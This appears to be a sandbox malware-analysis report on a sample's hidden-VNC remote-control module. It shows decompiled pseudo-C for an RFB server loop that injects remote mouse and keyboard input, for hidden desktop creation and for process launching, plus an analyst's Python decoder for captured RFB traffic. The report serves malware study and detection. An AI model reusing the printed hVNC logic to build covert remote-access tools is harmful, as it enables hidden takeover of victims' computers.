    						if(_v16 != 0) {
    							_v24(_v16);
    						}
    					}
    					FreeLibrary(_v20);
    				}
    				return _v5 & 0x000000ff;
    			}

    APIs
    • LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00417CDB
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00417CFA
    • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00417D06
    • CreateProcessAsUserW.ADVAPI32(?,00000000,00408EAC,00000000,00000000,00000000,00408EAC,00408EAC,00000000,?,?,?,00000000,00000044), ref: 00417D77
    • CloseHandle.KERNEL32(?), ref: 00417D8A
    • CloseHandle.KERNEL32(?), ref: 00417D8F
    • FreeLibrary.KERNEL32(?), ref: 00417DA6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
    • API String ID: 3080530829-1103369309
    • Opcode ID: 7237c3f88202269f99e2911e343ac4e9e614d004b24a54491cf6b7f127eeb005
    • Instruction ID: b6f22354a605402fa7521ef26449bf774c4e317b46c81bfd816043db15bb7698
    • Opcode Fuzzy Hash: 7237c3f88202269f99e2911e343ac4e9e614d004b24a54491cf6b7f127eeb005
    • Instruction Fuzzy Hash: 6D2116B2D0021DAFDF009FE4DC849EEBBB9EF48344F14847AE505B2160D6789E85CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E00410F8B(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
    				signed int _v8;
    				signed int _v13;
    				signed short _v15;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				char _v31;
    				signed int _v32;
    				signed int _v36;
    				short _v41;
    				short _v43;
    				char _v44;
    				char _v49;
    				char _v52;
    				char _v53;
    				char _v56;
    				char _v60;
    				signed int _v64;
    				char _v77;
    				char _v78;
    				unsigned int _v80;
    				signed int _v84;
    				char _v100;
    				signed short _v102;
    				signed short _v104;
    				signed int _v109;
    				char _v112;
    				char _v116;
    				char _v124;
    				char _v380;
    				void* __edi;
    				void* __esi;
    				void* _t205;
    				char _t206;
    				void* _t208;
    				signed char _t212;
    				unsigned int _t220;
    				signed int _t225;
    				signed int _t257;
    				signed int _t261;
    				signed int _t262;
    				void* _t264;
    				signed int _t265;
    				void* _t274;
    				void* _t280;
    				signed int _t288;
    				signed int _t289;
    				void* _t291;
    				signed int _t292;
    				signed short _t296;
    				unsigned int _t297;
    				signed int _t300;
    				signed int _t301;
    				signed int _t303;
    				intOrPtr _t305;
    				signed int _t309;
    				void* _t311;
    				signed int _t312;
    				signed int _t316;
    				signed int _t318;
    				signed int _t319;
    				void* _t321;
    				signed int _t322;
    				signed int _t329;
    				void* _t331;
    				signed int _t332;
    				signed int _t333;
    				signed char _t335;
    				void* _t352;
    				signed int _t353;
    				void* _t355;
    				signed int _t356;
    				signed int _t366;
    				signed int _t375;
    				signed int _t382;
    				signed int _t389;
    				signed int _t390;
    				unsigned int _t426;
    				signed char _t442;
    				signed char _t444;
    				signed char _t446;
    				signed int _t452;
    				signed int _t461;
    				void* _t472;
    				signed int _t479;
    				signed int _t490;
    				signed int _t491;
    				signed int _t496;
    				char _t505;
    				intOrPtr _t506;
    				signed int _t507;
    				signed short _t509;
    				intOrPtr* _t517;
    				signed int _t525;
    				void* _t527;
    
    				_t506 = _a8;
    				_t206 = E004193D2(_t205, _a4, "RFB 003.003\n", 0xc);
    				if(_t206 == 0) {
    					L107:
    					return _t206;
    				}
    				_push(0x1b7740);
    				_push( &_v60);
    				_t208 = 0xc;
    				_t206 = E0041935B(_t208, _a4);
    				if(_t206 == 0) {
    					goto L107;
    				}
    				_push( &_v60);
    				_t472 = 4;
    				_t206 = E00416F0B(_t472, "RFB ", _t472);
    				if(_t206 != 0) {
    					goto L107;
    				}
    				_v53 = _t206;
    				_v49 = _t206;
    				_t212 = E00416A27( &_v52, "RFB ", 0);
    				_t206 = ((E00416A27( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
    				if(_t206 > 0x300) {
    					goto L107;
    				} else {
    					_v24 = _v24 & 0x00000000;
    					_v20 = 1;
    					 *((intOrPtr*)(_t506 + 4))( &_v24);
    					_t220 = _v20;
    					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
    					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
    					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
    					if(E004193D2( &_v36, _a4,  &_v36, 4) == 0) {
    						_v20 = _v20 | 0xffffffff;
    					}
    					_t225 = _v20;
    					if(_t225 == 0) {
    						return E00410F25(_t399, __eflags, _a4, _v24);
    					}
    					_t206 = _t225 - 1;
    					if(_t206 != 0) {
    						goto L107;
    					}
    					_t206 = E0041935B(1, _a4,  &_v31, 0x1b7740);
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_t206 =  *((intOrPtr*)(_t506 + 8))();
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_v36 = _v36 & 0x00000000;
    					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
    					_t403 = _t206;
    					_t541 = _t206;
    					if(_t206 == 0) {
    						goto L107;
    					}
    					_t206 = E00410D64( &_v124, _t403,  &_v36, _t541, _a12);
    					_t505 = _t206;
    					if(_t505 == 0) {
    						goto L107;
    					}
    					_t507 = E00416EE5(_v36);
    					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
    					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
    					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
    					_t44 = _t505 + 0x20; // 0x20
    					E004163E4( &_v100, _t44, 0x10);
    					asm("rol word [ebp-0x5c], 0x8");
    					asm("rol word [ebp-0x5a], 0x8");
    					asm("rol word [ebp-0x58], 0x8");
    					if(E004193D2( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E004193D2(_t247, _a4, _v36, _t507) == 0) {
    						return E00410EF2(_t505);
    					} else {
    						_v41 = 0xffff;
    						_v44 = 0;
    						_v43 = 0xffff;
    						E0041645B( &_v380,  &_v380, 0, 0xff);
    						E0041645B( &_v380,  &_v380, 0, 0xff);
    						_v8 = 0;
    						_v20 = 0;
    						goto L16;
    						do {
    							while(1) {
    								L16:
    								_t375 = _v8;
    								_t509 = 0;
    								if(_t375 <= 0) {
    									goto L35;
    								}
    								L17:
    								_t274 = E00419658(0,  &_a4, 0x12c, 0);
    								if(_t274 != 0xffffffff) {
    									goto L35;
    								}
    								__imp__#111();
    								if(_t274 != 0x274c) {
    									L104:
    									E00410EF2(_t505);
    									return E004163A8(_v20);
    								}
    								if(_a16 != 0) {
    									WaitForSingleObject(_a16, 0xffffffff);
    								}
    								 *((intOrPtr*)(_a8 + 0x10))();
    								_v28 = _t509;
    								if(_t375 <= _t509) {
    									L33:
    									if(_a16 != _t509) {
    										ReleaseMutex(_a16);
    									}
    									continue;
    									do {
    										while(1) {
    											L16:
    											_t375 = _v8;
    											_t509 = 0;
    											if(_t375 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    										L90:
    										__eflags =  *(_t505 + 0x1c);
    									} while ( *(_t505 + 0x1c) != 0);
    									break;
    								} else {
    									_v24 = _t509;
    									_t390 = _t375 * 9;
    									do {
    										_t527 = _v24 + _v20;
    										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
    											_push(_t527);
    											_push(_a4);
    											_t280 = E004109FC(_t505);
    											if(_t280 == 0xffffffff || _t280 == 0) {
    												__eflags = _a16;
    												if(_a16 != 0) {
    													ReleaseMutex(_a16);
    												}
    												goto L104;
    											} else {
    												if(_t280 == 1) {
    													_t283 = _v28 + 1;
    													if(_v28 + 1 != _v8) {
    														E0041645B(_t283, _t527, 0, 9);
    													} else {
    														_v8 = _v8 - 1;
    														_t390 = _t390 - 9;
    														E00416333(_t390,  &_v20);
    													}
    												}
    												goto L31;
    											}
    										}
    										L31:
    										_v28 = _v28 + 1;
    										_v24 = _v24 + 9;
    									} while (_v28 < _v8);
    									_t509 = 0;
    									goto L33;
    								}
    								L35:
    								_t376 = _a4;
    								_t414 = _a4;
    								_t257 = E0041935B(1, _a4,  &_a15, 0x1b7740);
    								__eflags = _t257;
    								if(_t257 == 0) {
    									goto L104;
    								}
    								_t261 = _a15 & 0x000000ff;
    								__eflags = _t261;
    								if(_t261 == 0) {
    									_t262 = E004193A3(_t414, _t376, 3, 0x1b7740);
    									__eflags = _t262;
    									if(_t262 == 0) {
    										goto L104;
    									}
    									_push(0x1b7740);
    									_push( &_v80);
    									_t264 = 0x10;
    									_t265 = E0041935B(_t264, _t376);
    									__eflags = _t265;
    									if(_t265 == 0) {
    										goto L104;
    									}
    									__eflags = _v80 - 0x20;
    									if(_v80 == 0x20) {
    										L99:
    										__eflags = _v77;
    										if(_v77 == 0) {
    											goto L104;
    										}
    										asm("rol word [ebp-0x48], 0x8");
    										asm("rol word [ebp-0x46], 0x8");
    										asm("rol word [ebp-0x44], 0x8");
    										__eflags = _v78;
    										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
    										_t196 = _t505 + 0x31; // 0x31
    										_v77 = 1;
    										E004163E4(_t196,  &_v80, 0x10);
    										 *(_t505 + 0x41) = _v80 >> 3;
    										while(1) {
    											L16:
    											_t375 = _v8;
    											_t509 = 0;
    											if(_t375 <= 0) {
    												goto L35;
    											}
    											goto L17;
    										}
    									}
    									__eflags = _v80 - 0x10;
    									if(_v80 == 0x10) {
    										goto L99;
    									}
    									__eflags = _v80 - 8;
    									if(_v80 != 8) {
    										goto L104;
    									}
    									goto L99;
    								}
    								_t288 = _t261;
    								__eflags = _t288;
    								if(_t288 == 0) {
    									_t289 = E004193A3(_t414, _t376, 1, 0x1b7740);
    									__eflags = _t289;
    									if(_t289 == 0) {
    										goto L104;
    									}
    									_push(0x1b7740);
    									_push( &_v32);
    									_t291 = 2;
    									_t292 = E0041935B(_t291, _t376);
    									__eflags = _t292;
    									if(_t292 == 0) {
    										goto L104;
    									}
    									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
    									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
    									 *(_t505 + 0x48) = _t296;
    									__eflags = _t296;
    									if(_t296 == 0) {
    										L89:
    										_t297 =  *(_t505 + 0x4c);
    										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
    										 *(_t505 + 0x50) = _t490;
    										__eflags = _t297 - 5;
    										if(_t297 != 5) {
    											E004163A8( *(_t505 + 0x1c));
    											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
    											while(1) {
    												L16:
    												_t375 = _v8;
    												_t509 = 0;
    												if(_t375 <= 0) {
    													goto L35;
    												}
    												goto L17;
    											}
    										}
    										goto L90;
    									}
    									_t378 = (_t296 & 0x0000ffff) << 2;
    									_t161 = _t505 + 0x44; // 0x44
    									_t517 = _t161;
    									_t301 = E00416333((_t296 & 0x0000ffff) << 2, _t517);
    									__eflags = _t301;
    									if(_t301 == 0) {
    										goto L104;
    									}
    									_t303 = E0041935B(_t378, _a4,  *_t517, 0x1b7740);
    									__eflags = _t303;
    									if(_t303 == 0) {
    										goto L104;
    									}
    									_v28 = _v28 & 0x00000000;
    									__eflags = 0 -  *(_t505 + 0x48);
    									if(0 >=  *(_t505 + 0x48)) {
    										goto L89;
    									}
    									_t305 =  *_t517;
    									do {
    										_t491 = _v28 & 0x0000ffff;
    										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
    										_t305 =  *((intOrPtr*)(_t505 + 0x44));
    										_t426 = 5;
    										__eflags =  *(_t305 + _t491 * 4) - _t426;
    										if( *(_t305 + _t491 * 4) == _t426) {
    											 *(_t505 + 0x4c) = _t426;
    										}
    										_v28 = _v28 + 1;
    										__eflags = _v28 -  *(_t505 + 0x48);
    									} while (_v28 <  *(_t505 + 0x48));
    									goto L89;
    								}
    								_t309 = _t288 - 1;
    								__eflags = _t309;
    								if(_t309 == 0) {
    									_push(0x1b7740);
    									_push( &_v56);
    									_t311 = 9;
    									_t312 = E0041935B(_t311, _t376);
    									__eflags = _t312;
    									if(_t312 == 0) {
    										goto L104;
    									}
    									asm("rol word [ebp-0x33], 0x8");
    									asm("rol word [ebp-0x31], 0x8");
    									asm("rol word [ebp-0x2f], 0x8");
    									asm("rol word [ebp-0x2d], 0x8");
    									__eflags = _v56;
    									_t382 = 0;
    									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
    									__eflags = _v8;
    									if(_v8 <= 0) {
    										L76:
    										__eflags = _t382 - _v8;
    										if(_t382 != _v8) {
    											L78:
    											E004163E4(_t382 * 9 + _v20,  &_v56, 9);
    											while(1) {
    												L16:
    												_t375 = _v8;
    												_t509 = 0;
    												if(_t375 <= 0) {
    													goto L35;
    												}
    												goto L17;
    											}
    											goto L35;
    										}
    										_v8 = _v8 + 1;
    										_t316 = E00416333(_v8 * 9,  &_v20);
    										__eflags = _t316;
    										if(_t316 == 0) {
    											goto L104;
    										}
    										goto L78;
    									}
    									_t318 = _v20 + 7;
    									__eflags = _t318;
    									do {
    										__eflags =  *(_t318 - 2);
    										if( *(_t318 - 2) != 0) {
    											goto L75;
    										}
    										__eflags =  *_t318;
    										if( *_t318 == 0) {
    											goto L76;
    										}
    										L75:
    										_t382 = _t382 + 1;
    										_t318 = _t318 + 9;
    										__eflags = _t382 - _v8;
    									} while (_t382 < _v8);
    									goto L76;
    								}
    								_t319 = _t309 - 1;
    								__eflags = _t319;
    								if(_t319 == 0) {
    									_push(0x1b7740);
    									_push( &_v112);
    									_t321 = 7;
    									_t322 = E0041935B(_t321, _t376);
    									__eflags = _t322;
    									if(_t322 == 0) {
    										goto L104;
    									}
    									__eflags = _v112;
    									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
    									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
    									continue;
    								}
    								_t329 = _t319 - 1;
    								__eflags = _t329;
    								if(_t329 == 0) {
    									_push(0x1b7740);
    									_push( &_v16);
    									_t331 = 5;
    									_t332 = E0041935B(_t331, _t376);
    									__eflags = _t332;
    									if(_t332 == 0) {
    										goto L104;
    									}
    									asm("rol word [ebp-0xb], 0x8");
    									asm("rol word [ebp-0x9], 0x8");
    									_v24 = _v24 & 0x00000000;
    									_t525 = 0x8000;
    									_t333 = GetSystemMetrics(0x17);
    									__eflags = _t333;
    									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
    									__eflags = _v15 - _v43;
    									if(_v15 != _v43) {
    										L50:
    										_t525 = 0x8001;
    										L51:
    										_t335 = _v44;
    										_t442 = _v16 & 0x00000001;
    										__eflags = _t442 - (_t335 & 0x00000001);
    										if(_t442 != (_t335 & 0x00000001)) {
    											__eflags = _t442;
    											if(_t442 == 0) {
    												__eflags = _t496;
    												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
    												__eflags = _t461;
    											} else {
    												__eflags = _t496;
    												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
    											}
    											_t525 = _t525 | _t461;
    											__eflags = _t525;
    										}
    										_t444 = _v16 & 0x00000004;
    										__eflags = _t444 - (_t335 & 0x00000004);
    										if(_t444 != (_t335 & 0x00000004)) {
    											__eflags = _t444;
    											if(_t444 == 0) {
    												__eflags = _t496;
    												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
    												__eflags = _t452;
    											} else {
    												__eflags = _t496;
    												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
    											}
    											_t525 = _t525 | _t452;
    											__eflags = _t525;
    										}
    										_t446 = _v16 & 0x00000002;
    										__eflags = _t446 - (_t335 & 0x00000002);
    										if(_t446 != (_t335 & 0x00000002)) {
    											__eflags = _t446;
    											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
    											__eflags = _t525;
    										}
    										__eflags = _v16 & 0x00000008;
    										if((_v16 & 0x00000008) != 0) {
    											_t525 = _t525 | 0x00000800;
    											__eflags = _t525;
    											_v24 = 0x78;
    										}
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) != 0) {
    											_t525 = _t525 | 0x00000800;
    											__eflags = _t525;
    											_v24 = 0xffffff88;
    										}
    										E004163E4( &_v44,  &_v16, 5);
    										_t490 = _t525;
    										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
    										continue;
    									}
    									__eflags = _v13 - _v41;
    									if(_v13 == _v41) {
    										goto L51;
    									}
    									goto L50;
    								}
    								__eflags = _t329 != 1;
    								if(_t329 != 1) {
    									goto L104;
    								}
    								_push(0x1b7740);
    								_push( &_v116);
    								_t352 = 3;
    								_t353 = E0041935B(_t352, _t376);
    								__eflags = _t353;
    								if(_t353 == 0) {
    									goto L104;
    								}
    								_push(0x1b7740);
    								_push( &_v64);
    								_t355 = 4;
    								_t356 = E0041935B(_t355, _t376);
    								__eflags = _t356;
    								if(_t356 == 0) {
    									goto L104;
    								}
    								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
    								_t389 = E00416378(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
    								__eflags = _t389;
    								if(_t389 == 0) {
    									E004163A8(0);
    									goto L104;
    								}
    								_t366 = E0041935B(_v64, _a4, _t389, 0x1b7740);
    								__eflags = _t366;
    								if(_t366 == 0) {
    									goto L104;
    								}
    								_t490 = _v64;
    								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
    								E004163A8(_t389);
    							}
    							_t300 = E00416378(0x400);
    							 *(_t505 + 0x1c) = _t300;
    							__eflags = _t300;
    						} while (_t300 != 0);
    						goto L104;
    					}
    				}
    			}

    APIs
      • Part of subcall function 004193D2: send.WS2_32(00000004,00000004,00000004,00000000), ref: 004193E0
    • WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,004081C4,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 004111EB
    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 00411206
    • ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 00411298
    • GetSystemMetrics.USER32 ref: 004113B2
      • Part of subcall function 0041935B: recv.WS2_32(?,?,00000001,00000000), ref: 0041937F
    • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041173E
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: MutexRelease$ErrorFreeHeapLastMetricsObjectSingleSystemWaitrecvsend
    • String ID: $RFB $RFB 003.003$x
    • API String ID: 3911805420-914445781
    • Opcode ID: a93dd77a0eee532d62e5b0d67c93449088a3f373f4f35f522cc820a925edcc70
    • Instruction ID: 50a7ee7c8732a9901e3919c1521522228c6d68869365aea7d3e4266546838760
    • Opcode Fuzzy Hash: a93dd77a0eee532d62e5b0d67c93449088a3f373f4f35f522cc820a925edcc70
    • Instruction Fuzzy Hash: 3132F331A00219ABDF14DBA4C855BEEB7B5EF45304F04402BEA61E73D2DB789D85CB98
    Uniqueness

    Uniqueness Score: -1.00%
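
The function above is the sample's RFB 3.3 server loop for client-to-server messages (its string IDs include "RFB 003.003"; the recv() sizes of 4+4n, 9, 7, 5 and 3 then 4 bytes match SetEncodings, FramebufferUpdateRequest, KeyEvent, PointerEvent and ClientCutText). The PointerEvent branch diffs the button mask against the saved 5-byte copy and builds a flag word from 0x8000/0x8001, 2/4, 8/0x10, 0x20/0x40 and 0x800 with a wheel delta of +120 or -120, swapping left and right when GetSystemMetrics(0x17), that is SM_SWAPBUTTON, is non-zero; those values are the winuser.h MOUSEEVENTF_* constants. The decoder below is an added example written for this report, not code from the sample or from the sandbox output; it assumes the RFC 6143 message layouts, and the 1 MiB cap on ClientCutText is the example's own defensive choice rather than something observed in the sample.

```python
# Added example, not code from the sample or the sandbox report.  Layouts follow
# RFC 6143 and match the recv() sizes in the decompiled dispatcher.
import struct

# Client -> server message types handled by the dispatcher (RFC 6143, 7.5)
SET_ENCODINGS, FB_UPDATE_REQUEST, KEY_EVENT, POINTER_EVENT, CLIENT_CUT_TEXT = 2, 3, 4, 5, 6
ENCODING_HEXTILE = 5             # the only encoding the dispatcher tests for

# mouse_event() flags (winuser.h)
MOUSEEVENTF_MOVE, MOUSEEVENTF_ABSOLUTE = 0x0001, 0x8000
MOUSEEVENTF_LEFTDOWN, MOUSEEVENTF_LEFTUP = 0x0002, 0x0004
MOUSEEVENTF_RIGHTDOWN, MOUSEEVENTF_RIGHTUP = 0x0008, 0x0010
MOUSEEVENTF_MIDDLEDOWN, MOUSEEVENTF_MIDDLEUP = 0x0020, 0x0040
MOUSEEVENTF_WHEEL, WHEEL_DELTA = 0x0800, 120
MAX_CUT_TEXT = 1 << 20           # assumption: defensive cap chosen for this example

class Incomplete(Exception):
    """The buffer does not yet hold a whole message; read more and retry."""

def _need(buf, n):
    if len(buf) < n:
        raise Incomplete("need %d bytes, have %d" % (n, len(buf)))

def pointer_to_mouse_event(mask, x, y, prev, swap_buttons=False):
    """One PointerEvent -> (flags, wheel_data) for mouse_event(), given the
    previous (mask, x, y). Buttons yield DOWN/UP only when their bit changed."""
    flags = MOUSEEVENTF_ABSOLUTE | (MOUSEEVENTF_MOVE if (x, y) != prev[1:] else 0)
    left = (MOUSEEVENTF_LEFTDOWN, MOUSEEVENTF_LEFTUP)
    right = (MOUSEEVENTF_RIGHTDOWN, MOUSEEVENTF_RIGHTUP)
    if swap_buttons:                      # GetSystemMetrics(SM_SWAPBUTTON) != 0
        left, right = right, left
    middle = (MOUSEEVENTF_MIDDLEDOWN, MOUSEEVENTF_MIDDLEUP)
    for bit, (down, up) in ((0x01, left), (0x02, middle), (0x04, right)):
        if (mask ^ prev[0]) & bit:
            flags |= down if mask & bit else up
    wheel = 0
    if mask & 0x18:                       # bit 3 = wheel up, bit 4 = wheel down
        flags |= MOUSEEVENTF_WHEEL
        wheel = -WHEEL_DELTA if mask & 0x10 else WHEEL_DELTA
    return flags, wheel

def parse_client_message(buf):
    """Decode the message at the front of buf; return (fields, bytes_consumed)."""
    _need(buf, 1)
    mtype = buf[0]
    if mtype == SET_ENCODINGS:
        _need(buf, 4)
        (count,) = struct.unpack_from(">H", buf, 2)
        _need(buf, 4 + 4 * count)
        encs = list(struct.unpack_from(">%di" % count, buf, 4))
        return {"type": mtype, "encodings": encs,
                "hextile": ENCODING_HEXTILE in encs}, 4 + 4 * count
    if mtype == FB_UPDATE_REQUEST:
        _need(buf, 10)
        inc, x, y, w, h = struct.unpack_from(">BHHHH", buf, 1)
        return {"type": mtype, "incremental": bool(inc), "rect": (x, y, w, h)}, 10
    if mtype == KEY_EVENT:
        _need(buf, 8)
        down, key = struct.unpack_from(">BxxI", buf, 1)
        return {"type": mtype, "down": bool(down), "key": key}, 8
    if mtype == POINTER_EVENT:
        _need(buf, 6)
        mask, x, y = struct.unpack_from(">BHH", buf, 1)
        return {"type": mtype, "mask": mask, "x": x, "y": y}, 6
    if mtype == CLIENT_CUT_TEXT:
        _need(buf, 8)
        (length,) = struct.unpack_from(">I", buf, 4)
        if length > MAX_CUT_TEXT:
            raise ValueError("ClientCutText length %d over cap" % length)
        _need(buf, 8 + length)
        text = bytes(buf[8:8 + length]).decode("latin-1")   # RFB text is Latin-1
        return {"type": mtype, "text": text}, 8 + length
    raise ValueError("unhandled client message type %d" % mtype)

def decode_stream(data, swap_buttons=False):
    """Split a captured client->server stream into messages, carrying the
    previous pointer state across events as the dispatcher's loop does."""
    prev, out, view = (0, 0, 0), [], memoryview(data)
    while len(view):
        msg, n = parse_client_message(view)
        if msg["type"] == POINTER_EVENT:
            cur = (msg["mask"], msg["x"], msg["y"])
            msg["mouse_event"] = pointer_to_mouse_event(*cur, prev, swap_buttons)
            prev = cur
        out.append(msg)
        view = view[n:]
    return out

# Constructed sample stream: SetEncodings(hextile, raw), an incremental update
# request, KeyEvent 'a' down, a left click at (100, 200) and a ClientCutText.
SAMPLE_STREAM = (
    bytes([SET_ENCODINGS, 0]) + struct.pack(">Hii", 2, ENCODING_HEXTILE, 0)
    + bytes([FB_UPDATE_REQUEST, 1]) + struct.pack(">HHHH", 0, 0, 1024, 768)
    + bytes([KEY_EVENT, 1, 0, 0]) + struct.pack(">I", ord("a"))
    + bytes([POINTER_EVENT, 0x01]) + struct.pack(">HH", 100, 200)
    + bytes([POINTER_EVENT, 0x00]) + struct.pack(">HH", 100, 200)
    + bytes([CLIENT_CUT_TEXT, 0, 0, 0]) + struct.pack(">I", 5) + b"hello"
)
```

Feed decode_stream() the client-to-server half of a captured hVNC session; each PointerEvent comes back with the mouse_event() flag word the server side synthesizes, which is what to compare against when confirming the remote-control behaviour of the decompiled loop. Incomplete is raised when a message is cut at a read boundary, so a caller on a live socket keeps the bytes and retries once more have arrived.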

    C-Code - Quality: 100%
    			E00404C67(void* __ecx, void* __eflags, WCHAR* _a4) {
    				char _v5;
    				struct HWINSTA__* _v12;
    				struct HWINSTA__* _v16;
    				char _v32;
    				char _v48;
    				void* __esi;
    				struct HWINSTA__* _t23;
    				WCHAR* _t28;
    				int _t35;
    				struct HWINSTA__* _t41;
    				void* _t43;
    				WCHAR* _t45;
    				struct HDESK__* _t46;
    
    				_t43 = __ecx;
    				_t45 =  &_v32;
    				_v5 = 0;
    				E0040FA33(0xcc, _t45);
    				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
    				_v12 = _t23;
    				if(_t23 != 0) {
    					L2:
    					_v16 = GetProcessWindowStation();
    					if(E00404C3F(_t50, _v12) == 0) {
    						L13:
    						CloseWindowStation(_v12);
    						L14:
    						return _v5;
    					}
    					_t28 = _a4;
    					_a4 = _t28;
    					if(_t28 == 0) {
    						_t37 =  &_v48;
    						_a4 =  &_v48;
    						E0040FA33(0xcd, _t37);
    					}
    					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
    					if(_t46 != 0) {
    						L7:
    						if(E00404BFA(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
    							L9:
    							_v5 = 1;
    							L10:
    							CloseDesktop(_t46);
    							if(_v5 != 0) {
    								goto L13;
    							}
    							goto L11;
    						}
    						_t35 = SetThreadDesktop(_t46);
    						_v5 = 0;
    						if(_t35 == 0) {
    							goto L10;
    						}
    						goto L9;
    					} else {
    						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
    						_t54 = _t46;
    						if(_t46 == 0) {
    							L11:
    							_t58 = _v16;
    							if(_v16 != 0) {
    								E00404C3F(_t58, _v16);
    							}
    							goto L13;
    						}
    						goto L7;
    					}
    				}
    				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
    				_v12 = _t41;
    				_t50 = _t41;
    				if(_t41 == 0) {
    					goto L14;
    				}
    				goto L2;
    			}

    APIs
    • OpenWindowStationW.USER32 ref: 00404C8C
    • CreateWindowStationW.USER32 ref: 00404C9F
    • GetProcessWindowStation.USER32 ref: 00404CB0
    • OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00404CEB
    • CreateDesktopW.USER32 ref: 00404CFF
    • GetCurrentThreadId.KERNEL32 ref: 00404D0B
    • GetThreadDesktop.USER32(00000000), ref: 00404D12
    • SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 00404D24
    • CloseDesktop.USER32(00000000,00000000,00000000), ref: 00404D36
    • CloseWindowStation.USER32(?,?), ref: 00404D51
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
